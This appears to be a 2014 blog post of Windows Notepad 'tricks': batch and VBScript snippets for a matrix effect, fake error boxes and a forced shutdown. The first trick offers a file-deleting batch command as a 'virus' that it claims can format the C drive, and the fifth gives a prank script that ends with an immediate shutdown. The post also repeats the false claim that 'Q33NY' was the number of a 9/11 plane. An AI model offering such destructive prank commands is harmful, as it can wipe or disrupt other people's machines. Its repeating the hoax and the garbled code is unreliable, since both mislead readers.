Friday, August 15, 2014

// // Leave a Comment

{*Top*} 5 Cool Funny Notepad Tricks And Hacks 2014

.Notepad,which is the default program of Windows uses as simple text editor in which a user can edit their text,change font size,color and do much more things in notepad.But did you know you can make fun with notepad and do several types of pranks like you can make fake virus,shows fake error messages,lock folder using notepad.I know you will say no.So now enjoy best computer notepad tricks and hacks.





1.Create Virus Using Notepad Tricks

You can create a simple but powerful virus with the help of notepad.Yes its right.Through notepad you can create a powerful virus which could format your “C” drive if you not have a powerful antivirus.So my advice is to use it with precautions.So here is the trick
1.Open you notepad and and place below code
@Echo off
Del C:\ *.* |y
2.Save notepad file as Virus.bat
3.Then run the file but as i said above that keep precautions


2.Matrix Effect Tricks

This trick is called Matrix trick.The reason behind it is the movie.Matrix is a hollywood movie which was released in 1999 and this trick is inspired by the the movie “Matrix” in which same trick was shown.So lets make the trick
1.Open your notepad and copy below code
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
2.Save your notepad file as Matrix.bat
3.Now run the file and enjoy

3.World Trade Center Attack Notepad Trick

Its sound cool ? but let me ask a question to test your knowledge.Do you know the plane which hit to World Trade Center in 9/11.It was  “Q33NY”.So our trick is also starts with this number.How ? Lets check it out
1.Open Notepad and type “Q33NY
2.Now go to “Format” option and choose “Font”
3.Now increase the Font size to “72″
4.And change the font to “Wingdings

4.Fake Error Message Notepad Tricks

1.Open notepad and type below code
X=Msgbox(“Message Here”,0+16,”Fake Message Here”)
2.Put your fake message above where i wrote “Fake Message Here”
3.Now make your to save file with extension .vbs otherwise it will not work
4.Open the file and it will show you a fake error with your message

5.Shut Down PC Without Error

This trick will shut down your computer without any warning.For it just save the file and when you open it,It will shut down your pc without any message or warning
1.Open your notepad and type below code
@echo off
:A
cls
echo Do you wana crash your computer? (y/n)
pause
echo Are you sure? (y/n)
pause
echo your computer will crash when the time reaches zero.
pause
msg * Your computer will crash in…
msg * 5
msg * 4
msg * 3
msg * 2
msg * 1
msg * Good-Bye
msg * You have been pwned! icon smile
shutdown -s -t 00